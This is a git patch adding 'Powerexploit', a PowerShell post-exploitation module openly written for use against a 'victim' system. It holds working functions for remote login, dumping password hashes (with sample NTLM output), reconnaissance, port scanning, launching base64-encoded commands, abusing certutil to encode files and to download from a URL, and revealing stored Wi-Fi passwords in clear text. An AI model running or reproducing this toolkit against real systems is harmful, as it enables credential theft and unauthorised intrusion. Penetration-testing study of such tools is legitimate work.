From af6272fda3614c7de05ef5412e5e031262b4e355 Mon Sep 17 00:00:00 2001 From: Ankit Dobhal Date: Thu, 27 Feb 2020 14:09:46 +0530 Subject: [PATCH] Added Powerexploit module --- PostExploitation/Powerexploit.psm1 | 465 +++++++++++++++++++++++++++++ 1 file changed, 465 insertions(+) create mode 100644 PostExploitation/Powerexploit.psm1 diff --git a/PostExploitation/Powerexploit.psm1 b/PostExploitation/Powerexploit.psm1 new file mode 100644 index 0000000..ef5ea3d --- /dev/null +++ b/PostExploitation/Powerexploit.psm1 @@ -0,0 +1,465 @@ +<# +__________ .__ .__ __ +\______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + .Synopsis + Powerexploit is a pentesting tool contains scanning,remoting,post exploitation functionality. + #> + + + <# + .Synopsis + Invoke-login is an remote session function. + .DESCRIPTION + Invoke-login is a remote access function will help the attacker to remotely login inside the victim system. + .EXAMPLE + PS > Invoke-login laptop-ame0s3jl(computername) Elliot(username) + exploit the remote system + [laptop-ame0s3jl]: PS C:\Users\Elliot\Documents> + #> + function start-login { + param ([string]$computername,[string]$credntial) + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + Write-Host -fore green "exploiting the remote system" + Enter-PSSession -ComputerName $computername -Credential $credntial + } + } +<# + .Synopsis + Get-data is a used for information gathering about victim system. + .DESCRIPTION + Get-data is a information gathering function in powerexploit module. + .EXAMPLE + PS > Get-data + The victim is running on kernal 10.0.17763 With the username Elliot & Computername is laptop-ame0s3jl\Elliot . + #> + function Get-data { + param () + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + $wmiobject = get-wmiobject -class win32_operatingsystem + $user = ($wmiobject).RegisteredUser + $kernal_version = ($wmiobject).Version + Write-host -fore green "The victim is running on kernal $kernal_version ","With the username $user & Computername is $(whoami) ." +} +} +<# + .Synopsis + Get-dumphash is a hash dumping function inspired by posh-secmod module in powershell. + .DESCRIPTION + Get-dumphash function will help attacker to dump the hashes of victim login accounts. + .EXAMPLE + PS> Get-dumphash +[i] Dumping the hashes.... +Administrator:500:d5d443c4c0b122cadd2c0598372715bc:6b1d6f8554f3f1240429a7b977cfoe23::: +Guest:501:71b02b342cee140bf9aea3a327bed57a:c1182d44aa3b20aa7e8879e4363a0c19::: +DefaultAccount:503:32f72b29dbc61355e2307b9d4eac1274:1ab057794bbbd58997aac74de499d0bb::: +WDAGUtilityAccount:504:7abecb7dcbf7938227b1ebd5c218c3db:6a46a24948de610e96faf4367d80101c::: +Elliot:1001:4ac1c641591b70c93571344bb13bf229:8b0c165f0e63a09d9b68bc704ef4f8ec::: + #> + function Get-dumphash { + param () + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + $enc = Get-PostHashdumpScript + $dump = powershell.exe -command $enc + write-host -fore green "[i] Dumping the hashes...." + Write-Output $dump + } + } +<# + .Synopsis + Invoke-lmap is network mapper for powershell. + .DESCRIPTION + Invoke-lmap is automated function for psnmap powershell linux build network mapper. + .EXAMPLE + PS> invoke-lmap 192.168.0.1 80 + (ip) (port) + #> + function Invoke-lmap { + param ($ip,[int]$port) + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + $scan = Invoke-PSnmap -Cn $ip -Port $port -Dns + Write-Host -fore green "[i] Scanning the IP $ Port with Dnslookup..." + Write-host -fore blue $scan + } + } + + <# + .Synopsis + start-Arjun is a port scanner function inspired by @arjunkathait which lets you to scan ip with specific ports. + .DESCRIPTION + Start-Arjun port scanner function will help you scan the network with specific port number much faster than nmap. + .EXAMPLE + PS> start-arjun 192.168.0.1 80 + (ip) (port) + #> + function Start-Arjun { + param ($ip,[int]$port) + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + $scan = test-netconnection -computername $ip -port $port -InformationLevel "Detailed" + $tcp = ($scan).TcpTestSucceeded + if ($tcp -eq "True") + { + Write-Host -fore green "Port $port is open!" + } + else { + Write-Host -fore green "Port $port is closed!" + } +} +} + <# + .Synopsis + start-Infoga is a function which will help you to find information about the victim system. + .DESCRIPTION + start-infoga is a combination of some cmdlets & functions in powershell version 5.1. + .EXAMPLE + PS> start-infoga + [i] Victim is running on Microsoft Windows 10 Home Single Language & version 10.0.17763.. +[i] victim computername is LAPTOP-AME0S3JL & computer model is Lenevo Laptop 15-da0xxx.. +[i] victim system root is C:\windows.. +[i] Victim current username is LAPTOP-AME0S3JL\Elliot.. +[i] victim admin password status is Disabled.. + #> + function Start-Infoga { + param () + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + $pc = Get-ComputerInfo + Write-host -fore green "[i] Victim is running on $(($pc).osname) & version $(($pc).OsVersion).." + Write-host -fore cyan "[i] victim computername is $(($pc).CsName) & computer model is $(($pc).CsModel).." + Write-host -fore blue "[i] victim system root is $(($pc).WindowsSystemRoot).." + Write-host -fore red "[i] Victim current username is $(($pc).CsUserName).." + Write-host -fore magenta "[i] victim admin password status is $(($pc).CsAdminPasswordStatus).." +} +} +<# + .Synopsis + get-whois is a function which will help you to loopkup the address & ip. + .DESCRIPTION + get-whois will lookup the url & ip address. + .EXAMPLE + PS> get-whois google.com + #> +function Get-Whois +{ + Param($Domain) + + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + if ($Domain) + { + [WebTools.Whois]::lookup($Domain, [WebTools.Whois+RecordType]::domain) + } + } +} + +<# + .Synopsis + Start-Encodedcommand is a post exploitation function . + .DESCRIPTION + Start-Encodedcommand function will help the attacker to generate important encoded commands inside the victim system. + .EXAMPLE + PS> Start-Encodedcommand + +__________ .__ .__ __ +\______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + +[i] Generating encoded commands in victim system..... +===================================================== +Base64 Encoded command : RwBlAHQALQBOAGUAdABJAFAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgA= +[i] Now launching encodedcommand in victim system..... +===================================================== + + +InterfaceAlias : Npcap Loopback Adapter +InterfaceIndex : 16 +InterfaceDescription : Npcap Loopback Adapter +IPv4Address : 169.254.177.174 +IPv6DefaultGateway : +IPv4DefaultGateway : +DNSServer : fec0:0:0:ffff::1 + fec0:0:0:ffff::2 + fec0:0:0:ffff::3 + #> + function Start-Encodedcommand + { + Param() + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + + $commands = @('Get-NetIPConfiguration','Get-ComputerInfo','Get-Date','Get-HotFix','powershell.exe -command {set-executionpolicy remotesigned}','getmac') + Write-Host -fore yellow "[i] Generating encoded commands in victim system....." + + for ($i = 0; $i -lt $commands.Count; $i++) + { + $bytes = [System.Text.Encoding]::Unicode.GetBytes($commands[$i]) + $encodedCommand = [Convert]::ToBase64String($bytes) + Write-Host -fore red "=====================================================" + Write-host -fore green "Base64 Encoded command : $encodedCommand" + Write-host -fore green "[i] Now launching encodedcommand in victim system....." + Write-Host -fore red "=====================================================" + $launch = powershell.exe -encodedcommand $encodedCommand + Write-host -fore blue $launch + } + } + } + + <# + .Synopsis + start-encodefile is a function used to encode & decode the files. + .DESCRIPTION + .EXAMPLE + PS > + #> + function Start-ToEncodefile { + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + Write-host -fore green "1. Encoding the victim files" + Write-host -fore magenta "2. Decoding the victim files" + $enter = Read-Host "What option you want? " + if ($enter -eq 1 ) + { + $file = Read-Host "Enter the name of file for encoding " + $file2 = Read-Host "Enter the name of new file contains cipher text " + $encode = certutil.exe -encode $file $file2 + Write-host -fore blue $encode + Write-host -fore green $(cat.exe $file2) + } + else { + $file_new = Read-Host "Enter the name of file for decoding " + $file2_new = Read-Host "Enter the name of new file contains plain text file " + $decode = certutil.exe -decode $file_new $file2_new + Write-host -fore blue $decode + Write-host -fore green $(cat.exe $file2_new) + } + } +} + +<# + .Synopsis + Invoke-downloader is little brother of wget. + .DESCRIPTION + .EXAMPLE + PS > + #> + function Invoke-Downloader + { + Param($url) + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + Write-Host -fore green "psf> Downloading the file..." + $download = certutil.exe -verifyCTL -split -f $url + Write-host -fore blue $download + } + } + +<# + .Synopsis + Invoke-Filehash is hashing function will help you to find out hashing algorithm(sha1,sha,md5) & their hashes. + .DESCRIPTION + .EXAMPLE + PS > + #> + function Get-hash + { + Param($file) + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + Write-Host -fore Yellow "psf> Generating the file hash with algorithms..." + $gen = Get-FileHash $file + Write-host -fore green "psf> [i0] Algorithm : $(($gen).Algorithm)" + Write-host -fore blue "psf> [i0] Hash : $(($gen).Hash)" + } + } + + <# + #> + function Get-WirelessInfo { + Process + { + $new = @( + " + __________ .__ .__ __ + \______ \______ _ __ ___________ ____ ___ _________ | | ____ |__|/ |_ + | ___/ _ \ \/ \/ // __ \_ __ \_/ __ \\ \/ /\____ \| | / _ \| \ __\ + | | ( <_> ) /\ ___/| | \/\ ___/ > < | |_> > |_( <_> ) || | + |____| \____/ \/\_/ \___ >__| \___ >__/\_ \| __/|____/\____/|__||__| + \/ \/ \/|__| + " ) + + Write-Host -fore green $new + Write-host -fore green "psf> [i] Victim Wi-fi Drivers information.........." + $driver = netsh.exe wlan show drivers + Write-output $driver + Write-host -fore green "psf> [i] Victim Wi-fi networks information.........." + $wlan = netsh.exe wlan SHOW NETWORKS MODE=BSSID + Write-output $wlan + Write-host -fore green "psf> [i] Victim Wi-fi all networks.........." + $networks = netsh.exe wlan show profile + Write-Output $networks + $ssid = Read-Host "Enter the ssid number shown above " + if ($ssid) { + $ssid_no = netsh.exe wlan show profile $ssid key=clear + Write-Output $ssid_no + } + else { + Write-host -fore yellow "psf> Not defined" + } + } + + } + <# + .Synopsis + .DESCRIPTION + .EXAMPLE + PS > + #> + function Get-website + { + Param($site) + Process + { + $webRequest = [net.WebRequest]::Create($site) + $web = New-Object System.Net.WebClient + Try { + (($webRequest.GetResponse()).Statuscode) -as [int] + $crawl = $web.DownloadString($site) + Write-Host -fore Blue $crawl + } + Catch { + Write-host -fore Red -nonewline "Access down..." + } + } + } \ No newline at end of file